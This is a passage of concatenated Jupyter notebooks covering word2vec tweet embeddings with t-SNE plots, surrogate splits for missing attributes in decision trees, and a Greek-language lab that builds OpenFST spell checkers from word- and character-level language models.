#pre-process tweets using our package df['tweet'] = df['tweet'].apply(lambda x: smtd_preprocessing.process_TweetText(x)) df['tweet'] = df['tweet'].apply(lambda x: tweet_tokenizer.tokenize(x)) tweets = df['tweet'].values ``` ## Train Embeddings Let's train our own embeddings.
``` #CBOW import time start = time.time() word2vec_tweet = Word2Vec(tweets,min_count=5, sg=0) end = time.time() print("CBOW Model Training Complete.\nTime taken for training is:{:.5f} sec ".format((end-start))) #Summarize the loaded model print("Summary of the model:",word2vec_tweet) #Summarize vocabulary words = list(word2vec_tweet.wv.vocab) print("Small part of Vocabulary of our model:",words[:10]) #Acess vector for one word print("Acess Vector for the word 'lol'",word2vec_tweet['lol']) from gensim.models import Word2Vec, KeyedVectors #To load the model import warnings warnings.filterwarnings('ignore') #ignore any generated warnings import numpy as np import matplotlib.pyplot as plt #to generate the t-SNE plot from sklearn.manifold import TSNE #scikit learn's TSNE #Preprocessing our models vocabulary to make better visualizations import nltk from nltk.corpus import stopwords nltk.download('stopwords') words_vocab= list(word2vec_tweet.wv.vocab)#all the words in the vocabulary. print("Size of Vocabulary:",len(words_vocab)) print("Few words in Vocabulary",words_vocab[:50]) #Let us remove the stop words from this it will help making the visualization cleaner stopwords_en = stopwords.words('english') words_vocab_without_sw = [word.lower() for word in words_vocab if not word in stopwords_en] print("Size of Vocabulary without stopwords:",len(words_vocab_without_sw)) print("Few words in Vocabulary without stopwords",words_vocab_without_sw[:30]) #The size didnt reduce much after removing the stop words so lets try visualizing only a selected subset of words #With the increase in the amount of data, it becomes more and more difficult to visualize and interpret #In practice, similar words are combined into groups for further visualization. 
keys = ['weekend','twitter','mcdonalds','coffee'] embedding_clusters = [] word_clusters = [] for word in keys: embeddings = [] words = [] for similar_word, _ in word2vec_tweet.most_similar(word, topn=10): words.append(similar_word) embeddings.append(word2vec_tweet[similar_word]) embedding_clusters.append(embeddings)#apending access vector of all similar words word_clusters.append(words)#appending list of all smiliar words print("Embedding clusters:",embedding_clusters[0][0])#Access vector of the first word only print("Word Clousters:",word_clusters[:2]) ``` ## Visualization We will visualize our embeddings using T-SNE. If you do not know aht T-SNE is or have forgotten please refer to Ch3 in the book. We will be using the T-SNE code previously introduced in a notebook from Ch3 which can be found [here](https://github.com/practical-nlp/practical-nlp/blob/master/Ch3/09_Visualizing_Embeddings_Using_TSNE.ipynb). ``` from sklearn.manifold import TSNE import numpy as np embedding_clusters = np.array(embedding_clusters) n, m, k = embedding_clusters.shape #geting the dimensions tsne_model_en_2d = TSNE(perplexity=10, n_components=2, init='pca', n_iter=1500, random_state=2020) embeddings_en_2d = np.array(tsne_model_en_2d.fit_transform(embedding_clusters.reshape(n * m, k))).reshape(n, m, 2) #reshaping it into 2d so we can visualize it from sklearn.manifold import TSNE import matplotlib.pyplot as plt import matplotlib.cm as cm import numpy as np %matplotlib inline #script for constructing two-dimensional graphics using Matplotlib def tsne_plot_similar_words(labels, embedding_clusters, word_clusters, a=0.7): plt.figure(figsize=(16, 9)) for label, embeddings, words in zip(labels, embedding_clusters, word_clusters): x = embeddings[:,0] y = embeddings[:,1] plt.scatter(x, y, alpha=a, label=label) for i, word in enumerate(words): plt.annotate(word, alpha=0.5, xy=(x[i], y[i]), xytext=(5, 2), textcoords='offset points', ha='right', va='bottom', size=8) plt.legend(loc=4) plt.grid(True) 
plt.show() tsne_plot_similar_words(words_vocab_without_sw, embeddings_en_2d, word_clusters) ```
github_jupyter
#### Handling missing attributes at training If only a small fraction of data points have missing attributes and the amount of data at hand is very large one might as well exclude such *deficient* data points during training. This however is wasteful and is often times a luxury one cannot afford. A common way of handling missing data during training is by simply computing impurities (GNI, entropy, etc.) at nodes using whatever information is available, i.e. by ignoring missing information. To illustrate, consider a toy dataset below with 5 data points and 3 features. Data point $x_1$ is missing feature $f_2$, $x_2$ is missing $f_1$ and $x_4$ is missing both $f_2$ and $f_3$. | | $f_1$| $f_2$| $f_3$| |--------|------|------|------| | $x_1$ | 12.23| | 0.32 | | $x_2$ | |78.22 | 0.77 | | $x_3$ | 10.45|61.22 | 0.52 | | $x_4$ | 8.89 | | | | $x_5$ | 9.66 | 32.2 | 1.62 | Now while computing split for feature $f_1$ all but data point $x_2$ will be used since $x_2$ is missing feature $f_1$. Similarly for $f_2$, $x_1$ and $x_4$ will be excluded. Of course the impurities will be computed with different number of samples for different features but this is better than discarding *deficient* data points altogether. Do you see why? #### Handling missing attributes at inference In this section we will see how use of surrogate splits will allow us to handle missing attributes during inference. Surrogate split acts as a proxy for the primary split in case the data point is missing attribute which the primary split uses for making decision. Suppose the primary split at some node $N$ uses feature $f_i$ to decide which way a data point goes down the tree (left or right subtree) and suppose we encounter a data point for which that feature $f_i$ is missing. What would we do in such a case? The way *CART*s handle such a situation is by maintaining a series of surrogate or substitute splits.
Such surrogate splits are ordered by how well they approximate the primary split, often known as **predictive association**. Splits are tried in order (first the primary and then surrogate with best predictive association with the primary and then surrogate with second best association and so on) and the first split for which the data point has a value is used. **Predictive association** is simply the number of samples sent to the right and to the left by both splits. The goal of surrogate split here is to approximate primary split as close as possible. In doing so the surrogate split might however choose a threshold which might not be the optimal threshold in terms of reduction in impurity for that feature. Also it isn't true that a new subtree is grown for each surrogate split. That would be computationally prohibitive since that would require growing exponential subtrees. Why? Nor is it that the surrogate splits are second best split, third best split and so on in terms of impurity reduction. Surrogate splits simply route data roughly the same way as primary split but using different attributes and thresholds. Which also means surrogate splits might route few data points wrongly (to the right subtree instead of left and vice versa) compared to the primary split.
To drive the concept home lets work through the following toy example$^{1}$: | | $f_1$ | $f_2$ | $f_3$ | y | |------------|------ |-------|-------|----------| | $x_1$ | 0 | 7 | 8 | $c_1$ | | $x_2$ | 1 | 8 | 9 | $c_1$ | | $x_3$ | 2 | 9 | 0 | $c_1$ | | $x_4$ | 4 | 1 | 1 | $c_1$ | | $x_5$ | 5 | 5 | 2 | $c_1$ | | $x_6$ | 3 | 3 | 3 | $c_2$ | | $x_7$ | 6 | 0 | 4 | $c_2$ | | $x_8$ | 7 | 4 | 5 | $c_2$ | | $x_9$ | 8 | 5 | 6 | $c_2$ | | $x_{10}$ | 9 | 6 | 7 | $c_2$ | Lets first order samples by attribute values: | | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | |------------|-------|-------|-------|-------|-------|-------|-------|-------|-------|-------| | $f_1$ | <font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | <font color='blue'>$x_3$</font> | <font color='green'>$x_6$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$ </font>| <font color='green'>$x_7$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> | <font color='green'>$x_{10}$</font>| | $f_2$ | <font color='green'>$x_7$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$</font> | <font color='blue'>$x_6$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> |<font color='green'>$x_{10}$</font>| <font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | <font color='blue'>$x_3$</font> | | $f_3$ | <font color='blue'>$x_3$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$ </font>| <font color='green'>$x_6$</font> | <font color='green'>$x_7$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> | <font color='green'>$x_{10}$</font>| <font color='blue'><font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | It is obvious from above that $f_1 < 5.5$ provides best split of data in terms of impurity. Hence $f_1$ will be our primary split. Now among $f_2$ and $f_3$ which one forms a better surrogate split to $f_1 < 5.5$? 
As can be verified, $f_3 < 3.5$ is the best surrogate split. Why? (*Hint* : Go through each possible split for each attribute and find the split that best approximates the primary split) <img src='surrogate_split.svg' width="800"> How about error? How does generalization error evolve as a function of number of missing values in the data? (*Hint*: More the missing values more the use of surrogate splits during inference) Finally, can you guess which attribute is going to be picked as the best surrogate split based on correlation information between attributes? ##### References : [1] Examples and figure derived from *Chapter : 8.3.10 Missing attributes*, Pattern Classification, 2nd Edition : Richard O. Duda, Peter E. Hart, David G. Stork
github_jupyter
# 1η εργαστηριακή άσκηση: Εισαγωγή στις γλωσσικές αναπαραστάσεις <h2><center> Περιγραφή </center></h2> __Σκοπός__ αυτού του μέρους της 1ης εργαστηριακής άσκησης είναι να γίνει μια εισαγωγή σε διαφορετικές γλωσσικές αναπαραστάσεις και τη χρήση τους για γλωσσικά tasks. Στο πρώτο μέρος θα εμπλουτίσουμε τον ορθογράφο που φτιάξαμε στην προπαρασκευή με character level και word level unigram γλωσσικά μοντέλα. Στο δεύτερο μέρος θα κάνουμε μια εισαγωγή στις λεξικές αναπαραστάσεις bag-of-words και word2vec και θα τις χρησιμοποιήσουμε σε ένα απλό πρόβλημα ταξινόμησης. <h2><center> Μέρος 1: Ορθογράφος </h2></center> Αρχικά κατεβάζουμε το corpus που θα χρησιμοποιήσουμε. Θα ασχοληθούμε με το βιβλίο __War of the Worlds__ όπως και στην προπαρασκευή έτσι ώστε να μπορούμε να συγκρίνουμε τα αποτελέσματα πάνω στο ίδιο corpus. Με την παρακάτω εντολή, λοιπόν, το κατεβάζουμε από το project Gutenberg σε plain txt μορφή και το αποθηκεύουμε με το όνομα __War.txt__. ``` ! wget -c http://www.gutenberg.org/files/36/36-0.txt -O War.txt ``` ### Βήμα 10: Εξαγωγή στατιστικών Στο βήμα αυτό θα κατασκευάσουμε 2 πηγές στατιστικών για τα γλωσσικά μας μοντέλα, μία __word/token level__ και μία __character level__. Για το βήμα αυτό αλλά και για την συνέχεια της άσκησης θα χρειαστούμε ορισμένες συναρτήσεις που υλοποιήθηκαν στην προπαρασκευή και μας βοηθάνε στην επεξεργασία του corpus. Συγκεκριμένα έχουμε τις εξής συναρτήσεις (η περιγραφή της λειτουργίας τους βρίσκεται στην προπαρασκευή): __1. identity_preprocess:__ ``` # Gets a string as input and just returns the same string. def identity_preprocess(string_var): return string_var ``` __2. read_path:__ ``` # Reads a file tokenizing each line. def read_path(file_path, preprocess = identity_preprocess): # Initilize the list of processed lines processed_lines = [] # Open file to read mode with open(file_path, "r") as f: for line in f: # Omit spaces if not line.isspace(): processed_lines.extend(preprocess(line)) return processed_lines ``` __3. 
tokenize:__ ``` import string # Tokenize a sttring def tokenize(s): # Remove possible spaces from the start or the end of the string and # turn all letters lowercase. s = s.strip().lower() # Remove all punctuations, symbols and numbers from the string leaving # only lowercase alphabetical letters. s = "".join((char for char in s if char not in string.punctuation and not char.isdigit())) # Replace new line characters with spaces s = s.replace('\n',' ') # Split the string in every space resulting in a list of tokens res = s.split(" ") return res ``` __4. get_tokens:__ ``` # Get all separate tokens from a file. def get_tokens(file_path): tokens = read_path(file_path, tokenize) distinct_tokens = list(dict.fromkeys(tokens)) return distinct_tokens ``` __5. get_alphabet:__ ``` # Get the alphabet of a file given its tokens. def get_alphabet(tokens): alphabet = [] for token in tokens: alphabet.extend(list(token)) alphabet = list(dict.fromkeys(alphabet)) return alphabet ``` Τώρα, λοιπόν, που έχουμε ορίσει τις συναρτήσεις που χρειαζόμαστε από την προπαρασκευή μπορούμε να συνεχίσουμε κανονικά στο βήμα 10. __α) token level:__ Πρέπει να εξάγουμε την πιθανότητα εμφάνισης κάθε token (λέξης) του βιβλίου και να την αποθηκεύσουμε σε ένα λεξικό με __key το token και value την πιθανότητα εμφάνισής του__. __Διαδικασία: __ - Θα φτιάξουμε μία συνάρτηση η οποία θα δέχεται ως όρισμα το path του corpus και θα επιστρέφει το ζητούμενο λεξικό. Αρχικά, θα αποθηκεύει σε μία λίστα όλα τα tokens χρησιμοποιώντας την συνάρτηση get_tokens και θα αρχικοποιεί το λεξικό μας με αυτά τα tokens ως keys και με value ίσο με 0. Στη συνέχεια, για κάθε λέξη του corpus θα αυξάνουμε το αντίστοιχο value στο λεξικό μας. Έτσι αφού διαιρέσουμε και κάθε value με τον αριθμό όλων των λέξεων του βιβλίου (για να μετατραπεί σε μία πιθανότητα) θα έχουμε δημιουργήσει το ζητούμενο λεξικό. ``` def token_level(path): # Keys of the dictionary are all discrete tokens. 
keys = get_tokens(path) # Initialize the dictionary with the above keys and all values equal to 0. dict_token = dict.fromkeys(keys, 0) # Get a list with all the words containing in the corpus. words = read_path(path, tokenize) # For each word increase the value of the corresponding key. for word in words: dict_token[word] += 1 # Divide each value with the total number of words to get the probability of each key. dict_token = {k: v / len(words) for k, v in dict_token.items()} return dict_token ``` - Καλούμε την συνάρτηση που ορίσαμε παραπάνω και αποθηκεύουμε το λεξικό μας ως __dict_token__. ``` # Get the dictionary of the frequency of each token. dict_token = token_level("War.txt") ``` __β) character level:__ Εδώ πρέπει να εξάγουμε την πιθανότητα εμφάνισης κάθε χαρακτήρα του corpus και, αντίστοιχα με πριν, να την αποθηκεύσουμε σε ένα λεξικό με key τον χαρακτήρα και value την πιθανότητα εμφάνισής του. __Διαδικασία:__ - Αντίστοιχα λοιπόν παραπάνω θα φτιάξουμε μία παρόμοια συνάρτηση, η οποία αυτή τη φορά θα κάνει την ίδια διαδικασία για κάθε χαρακτήρα του corpus αντί για κάθε λέξη. Εδώ θα χρησιμοποιηθεί η συνάρτηση get_alphabet η οποία θα μας δώσει τα keys του λεξικού μας. Τα values θα υπολογιστούν διατρέχοντας μία φορά όλα το βιβλίο και αυξάνοντας κάθε φορά κατά 1 το value του που αντιστοιχεί στον χαρακτήρα που συναντάμε. Τέλος, πρέπει να διαιρέσουμε με όλους τους εμφανιζόμενους χαρακτήρες. ``` def character_level(path): # Keys of the dictionary are the alphabet of the corpus. keys = get_alphabet(get_tokens(path)) # Initialize the dictionary with the above keys and all values equal to 0. dict_character = dict.fromkeys(keys, 0) # Get a list with all the words containing in the corpus. words = read_path(path, tokenize) # Counter that will keep track of all the characters in the corpus. total = 0 # For each letter of each word increase the corresponding value. 
for word in words: for char in list(word): total += 1 dict_character[char] += 1 # Divide each value with the total number of characters to get the probability of each key. dict_character = {k: v / total for k, v in dict_character.items()} return dict_character ``` Καλούμε την συνάρτηση που ορίσαμε παραπάνω και αποθηκεύουμε το λεξικό μας ως __dict_character__. ``` dict_character = character_level("War.txt") ``` Ολοκληρώνοντας, λοιπόν, το βήμα 10 έχουμε δύο λεξικά που αποτελούν τις πηγές στατιστικών για τα γλωσσικά μας μοντέλα, ένα word/token level και ένα character level. ### Βήμα 11: Κατασκευή μετατροπέων FST Για τη δημιουργία του ορθογράφου θα χρησιμοποιήσουμε μετατροπείς βασισμένους στην απόσταση Levenshtein. Θα χρησιμοποιήσουμε 3 τύπους από edits κάθε ένα από τα οποία χαρακτηρίζεται από ένα κόστος. Έχουμε: - __εισαγωγές χαρακτήρων__ - __διαγραφές χαρακτήρων__ - __αντικαταστάσεις χαρακτήρων__ __α)__ Στο βήμα αυτό θα υπολογίσουμε την μέση τιμή των βαρών του word level μοντέλου που κατασκευάσαμε στο βήμα 10α, το οποίο θα αποτελεί το κόστος w των edits. Συγκεκριμένα, αφού έχουμε την πιθανότητα εμφάνισης κάθε λέξης, το βάρος της ορίζεται ως ο αρνητικός λογάριθμος της πιθανότητας εμφάνισής της, δηλαδή __w = -log(P)__. Υπολογίζοντας, λοιπόν, το βάρος κάθε λέξης και παίρνοντας την μέση τιμή όλων των βαρών έχουμε το κόστος w, το οποίο επειδή προκύπτει από το token level μοντέλο το ονομάζουμε __w_token__. ``` from math import log10 # Calculate weight of each word. token_weights = {k:(-log10(v)) for k,v in dict_token.items()} # Get the mean value of weigths. w_token = sum(token_weights.values()) / len(token_weights.values()) ``` __β)__ Στο βήμα αυτό θα κατασκευάσουμε τον μετατροπέα μας με μία κατάσταση που υλοποιεί την απόσταση Levenshtein αντιστοιχίζοντας: - Kάθε χαρακτήρα στον εαυτό του με βάρος 0 __(no edit)__. - Kάθε χαρακτήρα στο <epsilon\> (ε) με βάρος w __(deletion)__. - Tο <epsilon\> σε κάθε χαρακτήρα με βάρος w __(insertion)__. 
- Kάθε χαρακτήρα σε κάθε άλλο χαρακτήρα με βάρος w __(substitution)__. Όπως και στην προπαρασκευή θα ορίσουμε την συνάρτηση format_arc η οποία διαμορφώνει μία γραμμή του αρχείου περιγραφής του κάθε FST. Συγκεκριμένα δέχεται ως όρισμα τα __src__, __dest__, __ilabel__, __olabel__ και το __weight__ (με default τιμή το 0) και τα επιστρέφει στην κατάλληλη μορφή όπως αναφέρεται και εδώ http://www.openfst.org/twiki/bin/view/FST/FstQuickTour#CreatingFsts/. ``` def format_arc(src, dest, ilabel, olabel, weight=0): return (str(src) + " " + str(dest) + " " + str(ilabel) + " " + str(olabel) + " " + str(weight)) ``` Ακόμη, από την στιγμή που θα κατασκευάσουμε ορισμένα FSTs θα χρειαστούμε ένα αρχείο __chars.syms__ το οποίο θα αντιστοιχίζει κάθε χαρακτήρα του αλφαβήτου με έναν αύξοντα ακέραιο αριθμό. Η διαδικασία αυτή έγινε στο βήμα 4 της προπαρασκευής και περιλαμβάνει την συνάρτηση alphabet_to_int όπως βλέπουμε και παρακάτω: ``` def alphabet_to_int(alphabet): # Open file f = open("chars.syms", "w") # Match epsilon to 0 f.write("EPS" + 7*" " + str(0) + '\n') num = 21 for character in alphabet: # Match every other character to an increasing index f.write(character + 7*" " + str(num) + '\n') num += 1 f.close() alphabet_to_int(get_alphabet(get_tokens("War.txt"))) ``` Στη συνέχεια, διαμορφώνουμε το αρχείο περιγραφής του μετατροπεά μας σύμφωνα με τις παραπάνω αντιστοιχίσεις. Το αποτέλεσμα αποθηκεύεται στο αρχείο __transducer_token.fst__ (συμβολίζουμε το (ε) με "EPS"). 
``` # Get alphabet of the corpus alphabet = get_alphabet(get_tokens("War.txt")) # Open file to write mode f = open("transducer_token.fst", "w") for letter in alphabet: # no edit f.write(format_arc(0, 0, letter, letter) + "\n") # deletion f.write(format_arc(0, 0, letter, "EPS", w_token) + "\n") # insertion f.write(format_arc(0, 0, "EPS", letter, w_token) + "\n") for i in range(len(alphabet)): for j in range(len(alphabet)): if i != j: # substitution f.write(format_arc(0, 0, alphabet[i], alphabet[j], w_token) + "\n") # Make initial state also final state f.write("0") # Close file f.close() ``` Αντίστοιχα με την προπαρασκευή τρέχουμε το παρακάτω shell command που κάνει compile τον μετατροπέα μας. Το binary αρχείο που προκύπτει με όνομα __transducer_token.fst__ είναι αυτό που θα χρησιμοποιήσουμε στις επόμενες λειτουργίες. ``` ! fstcompile --isymbols=chars.syms --osymbols=chars.syms transducer_token.fst transducer_token.fst ``` __γ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία χρησιμοποιώντας το unigram γλωσσικό μοντέλο του βήματος 10β. Θα υπολογίσουμε αρχικά το νέο κόστος των edit το οποίο ισούται με τη μέση τιμή των βαρών του character level μοντέλου και στη συνέχεια θα γράψουμε στο αρχείο __transducer_char.fst__ την περιγραφή του μετατροπέα που θα χρησιμοποιεί το μοντέλο αυτό. ``` # Calculate weight of each character. character_weigths = {k: (-log10(v)) for k,v in dict_character.items()} # Get the mean value of weigths. 
w_char = sum(character_weigths.values()) / len(character_weigths.values()) # Open file to write mode f = open("transducer_char.fst", "w") for letter in alphabet: # no edit f.write(format_arc(0, 0, letter, letter) + "\n") # deletion f.write(format_arc(0, 0, letter, "EPS", w_char) + "\n") # insertion f.write(format_arc(0, 0, "EPS", letter, w_char) + "\n") for i in range(len(alphabet)): for j in range(len(alphabet)): if i != j: # substitution f.write(format_arc(0, 0, alphabet[i], alphabet[j], w_char) + "\n") # Make initial state also final state f.write("0") # Close file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms transducer_char.fst transducer_char.fst ``` __δ)__ Αυτός είναι ένας αρκετά αφελής τρόπος για τον υπολογισμό των βαρών για κάθε edit. Αν τώρα είχαμε στη διάθεση μας ό,τι δεδομένα θέλουμε αυτό που θα κάναμε είναι ότι θα υπολογίζαμε τα βάρη με βάση το πόσο συχνά γίνεται αυτό το λάθος. Πιο συγκεκριμένα, θα υπολογίζαμε για κάθε σύμβολο του αλφαβήτου την πιθανότητα κάποιος να το διαγράψει, να το προσθέσει ή να το αντικαταστήσει με κάποιο άλλο. Στη συνέχεια, θα μετατρέπαμε αυτές τις πιθανότητες σε κόστη παίρνοντας τον αρνητικό λογάριθμο και θα είχαμε τα τελικά βάρη μας για κάθε σύμβολο στο deletion και το insertion και για κάθε δυάδα συμβόλων στο substitution. Ο υπολογισμός αυτός μπορεί να γίνει σε περίπτωση που είχουμε το ίδιο corpus αλλά με λάθη για να μπορούμε να βρούμε πολύ απλά τις μετρικές που θέλουμε. ### Βήμα 12: Κατασκευή γλωσσικών μοντέλων __α)__ Στο βήμα αυτό θα κατασκευάσουμε έναν αποδοχέα με μία αρχική κατάσταση που θα αποδέχεται κάθε λέξη του λεξικού όπως αυτό ορίστηκε στην προπαρασκευή του εργαστηρίου στο βήμα 3α. Τώρα, όμως, ως βάρη θα χρησιμοποιήσουμε τον αρνητικό λογάριθμο της πιθανότητας εμφάνισης κάθε λέξης __-logP(w)__. Πρέπει το κόστος αυτό να κατανεμηθεί κάπως στην λέξη έτσι ώστε όλη η λέξη συνολικά να έχει το παραπάνω κόστος. 
Για λόγους βελτιστοποίησης και απλότητας προφανώς συμφέρει να βάλουμε όλο το κόστος της λέξης μόνο στην πρώτη ακμή της και τις υπόλοιπες να τις θέσουμε 0. Το αρχείο περιγραφής του αποδοχέα αποθηκεύεται ως __acceptor_token.fst__. ``` # Get tokens of the corpus (our acceptor should accept only these words) tokens = get_tokens("War.txt") # Open file to write mode f = open("acceptor_token.fst", "w") s = 1 for token in tokens: cost = token_weights[token] letters = list(token) for i in range(0, len(letters)): if i == 0: # For each token make state 1 its first state f.write(format_arc(1, s+1, letters[i], letters[i], cost) + "\n") else: f.write(format_arc(s, s+1, letters[i], letters[i]) + "\n") s += 1 if i == len(letters) - 1: # When reaching the end of a token go to final state 0 though an ε-transition f.write(format_arc(s, 0, "EPS", "EPS") + "\n") # Make state 0 final state f.write("0") # Close the file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms acceptor_token.fst acceptor_token.fst ``` __β)__ Στη συνέχεια καλούμε τις συναρτήσεις fstrmepsilon, fstdeterminize και fstminimize για να βελτιστοποιήσουμε το μοντέλο μας (η λειτουργία τους έχει αναφερθεί στην προπαρασκευή). ``` ! fstrmepsilon acceptor_token.fst acceptor_token.fst ! fstdeterminize acceptor_token.fst acceptor_token.fst ! fstminimize acceptor_token.fst acceptor_token.fst ``` __γ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία για το character level γλωσσικό μοντέλο. Αυτό που θα αλλάξει δηλαδή είναι ότι αντί να τοποθετούμε στην πρώτη ακμή της λέξης το κόστος ολόκληρης της λέξης θα ορίζουμε για την μετάβαση σε κάθε γράμμα της λέξης το αντίστοιχο κόστος του. Σημειώνεται ότι αντίστοιχα με πριν το κόστος ενός χαρακτήρα ισούται με τον αρνητικό λογάριθμο της πιθανότητας εμφάνισής του. Το αρχείο περιγραφής του αποδοχέα αποθηκεύεται ως __acceptor_char.fst__. 
``` # Get tokens of the corpus (our acceptor should accept only these words) tokens = get_tokens("War.txt") # Open file to write mode f = open("acceptor_char.fst", "w") s = 1 for token in tokens: letters = list(token) for i in range(0, len(letters)): if i == 0: # For each token make state 1 its first state f.write(format_arc(1, s+1, letters[i], letters[i], character_weigths[letters[i]]) + "\n") else: f.write(format_arc(s, s+1, letters[i], letters[i], character_weigths[letters[i]]) + "\n") s += 1 if i == len(letters) - 1: # When reaching the end of a token go to final state 0 though an ε-transition f.write(format_arc(s, 0, "EPS", "EPS") + "\n") # Make state 0 final state f.write("0") # Close the file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms acceptor_char.fst acceptor_char.fst ! fstrmepsilon acceptor_char.fst acceptor_char.fst ! fstdeterminize acceptor_char.fst acceptor_char.fst ! fstminimize acceptor_char.fst acceptor_char.fst ``` ### Βήμα 13: Κατασκευή ορθογράφων Στο βήμα αυτό θα κατασκευάσουμε δύο ορθογράφους χρησιμοποιώντας τα FST από τα παραπάνω βήματα. Η διαδικασία για κάθε έναν ορθογράφο θα είναι ίδια με αυτή που ακολουθήθηκε στο βήμα 7 της προπαρασκευής. __α)__ Ο πρώτος ορθογράφος που θα κατασκευάσουμε θα προκύψει συνθέτοντας τον word level transducer με το word level γλωσσικό μοντέλο. Αρχικά θα ταξινομήσουμε τις εξόδους του transducer_token και τις εισόδους του acceptor_token με την συνάρτηση __fstarcsort__. ``` ! fstarcsort --sort_type=olabel transducer_token.fst transducer_token.fst ! fstarcsort --sort_type=ilabel acceptor_token.fst acceptor_token.fst ``` Στη συνέχεια συνθέτουμε τον transducer_token με τον acceptor_token με την συνάρτηση fstcompose αποθηκεύοντας τον spell checker μας στο αρχείο __spell_checker1.fst__. ``` ! fstcompose transducer_token.fst acceptor_token.fst spell_checker1.fst ``` __β)__ Ο δεύτερος ορθογράφος θα προκύψει συνθέτοντας τον word level tranducer με το unigram γλωσσικό μοντέλο. 
Αρχικά θα ταξινομήσουμε τις εισόδους του acceptor_char με την συνάρτηση __fstarcsort__. ``` ! fstarcsort --sort_type=ilabel acceptor_char.fst acceptor_char.fst ``` Στη συνέχεια συνθέτουμε τον transducer_token με τον acceptor_char με την συνάρτηση fstcompose αποθηκεύοντας τον spell checker μας στο αρχείο __spell_checker2.fst__. ``` ! fstcompose transducer_token.fst acceptor_char.fst spell_checker2.fst ``` __γ)__ Η διαφορά των δύο ορθογράφων βρίσκεται στο γλωσσικό μοντέλο που χρησιμοποιούν. Συγκεκριμένα: 1. __Word-Level μοντέλο:__ Ο 1ος ορθογράφος για να διορθώσει μία λέξη κοιτάει (πέρα από τον αριθμό των edits) την συχνότητα εμφάνισης της κάθε λέξης στο corpus. Έτσι, διορθώνει μία λέξη σε μία άλλη που είναι πιο πιθανό να είχε εμφανιστεί. 2. __Unigram μοντέλο:__ Ο 2ος ορθογράφος για να διορθώσει μία λέξη κοιτάει (πέρα από τον αριθμό των edits) την συχνότητα εμφάνισης κάθε γράμματος της διορθωμένης λέξης. Έτσι, διορθώνει μία λέξη αλλάζοντας κάθε γράμμα της στο πιο πιθανό που ήταν να εμφανιστεί. Για παράδειγμα έστω ότι έχουμε την λέξη __cit__ και οι δύο πιθανές λέξεις που βρίσκονται στο λεξικό μας και έχουν μόνο 1 αλλαγή είναι η __cat__ και η __cut__. Ο 1ος ορθογράφος πιθανώς να επιλέξει την cut επειδή είναι μία πιο συνιθισμένη λέξη. Από την άλλη, ο 2ο ορθογράφος μπορεί να επιλέξει την cat επειδή το γράμμα a εμφανίζεται πιο συχνά από το γράμμα u. Ένα αντίστοιχο παράδειγμα παρουσιάζεται στο τέλος του επόμενου βήματος όπου δίνουμε την λέξη qet στους δύο ορθογράφους. ### Βήμα 14: Αξιολόγηση των ορθογράφων __α)__ Για να κάνουμε το evaluation των δύο ορθογράφων κατεβάζουμε το παρακάτω σύνολο δεδομένων: ``` ! wget https://raw.githubusercontent.com/georgepar/python-lab/master/spell_checker_test_set ``` __β)__ Δημιουργούμε αρχικά μία συνάρτηση __predict__ η οποία δέχεται μία λέξη που πρέπει να διορθωθεί και γράφει σε ένα αρχείο __pred_word.fst__ την περιγραφή ενός FST το οποίο αποδέχεται την συγκεκριμένη λέξη. 
def predict(word):
    """Write pred_word.fst: a linear FST that accepts exactly *word*.

    State 1 is the start state.  Each letter contributes one zero-weight
    arc to a fresh state, and (for a non-empty word) an epsilon arc with
    zero weight leads into the final state 0.  The resulting file is
    later composed with a spell-checker FST by predict.sh.
    """
    # `with` guarantees the file is closed, exactly as the explicit
    # open()/close() pair did in the original.
    with open("pred_word.fst", "w") as fst:
        state = 1
        for letter in word:
            # One zero-weight arc per letter of the word.
            fst.write(format_arc(state, state + 1, letter, letter, 0) + '\n')
            state += 1
        if word:
            # Epsilon transition from the last letter's state to final state 0.
            fst.write(format_arc(state, 0, "EPS", "EPS", 0) + '\n')
        # Declare state 0 as the final state.
        fst.write("0")
- Ο 2ος ορθογράφος κατασκευάστηκε συνθέτοντας το unigram γλωσσικό μοντέλο με το word-level μετατροπέα. Αυτό σημαίνει ότι ο ορθογράφος προσπαθεί να διορθώσει μία λέξη λαμβάνοντας υπόψιν αυτή τη φορά πόσο πιθανό είναι το γράμμα το οποίο θέλει να διορθώσει. Αυτό το γλωσσικό μοντέλο επίσης αυξάνει την απόδοση γιατί όσο πιο πιθανό είναι ένα γράμμα τόσο και πιο πιθανό είναι να έχει γραφτεί λάθος το συγκεκριμένο γράμμα. Τα βάρη του μετατροπέα τώρα κάνουν την ίδια δουλειά που αναφέρθηκε και παραπάνω. Για να κατανοήσουμε καλύτερα την διαφορετική λειτουργία των 2 ορθογράφων δίνουμε ως είσοδο για διόρθωση την λέξη __qet__. ``` word = "qet" print(word + ":" + " ",end='') predict(word) print("1: ",end='') ! ./predict.sh spell_checker1.fst print(" 2: ",end='') ! ./predict.sh spell_checker2.fst ``` Παρατηρούμε ότι ο ορθογράφος με το word level γλωσσικό μοντέλο την διόρθωσε σε __get__, ενώ ο ορθογράφος με το unigram γλωσσικό μοντέλο την διόρθωσε σε __set__. Ο λόγος που συνέβη αυτό βρίσκεται στις πιθανότητες εμφάνισης κάθε λέξης αλλά και του συνολικού συνδυασμού των γραμμάτων κάθε λέξης. ``` print("Propability of word get: " + str(dict_token["get"])) print("Propability of word set: " + str(dict_token["set"])) print("Propability of characters g: " + str(dict_character["g"])) print("Propability of characters s: " + str(dict_character["s"])) ``` Βλέπουμε ότι η πιθανότητα να δούμε get είναι μεγαλύτερη από το να δούμε set και γι´ αυτό ο word-level ορθογράφος μας που κοιτάει τα word-level βάρη επέλεξε να διορθώσει το qet σε get. Από την άλλη η πιθανότητα να δούμε s είναι μεγαλύτερη από το να δούμε g με αποτέλεσμα ο 2ος ορθογράφος που 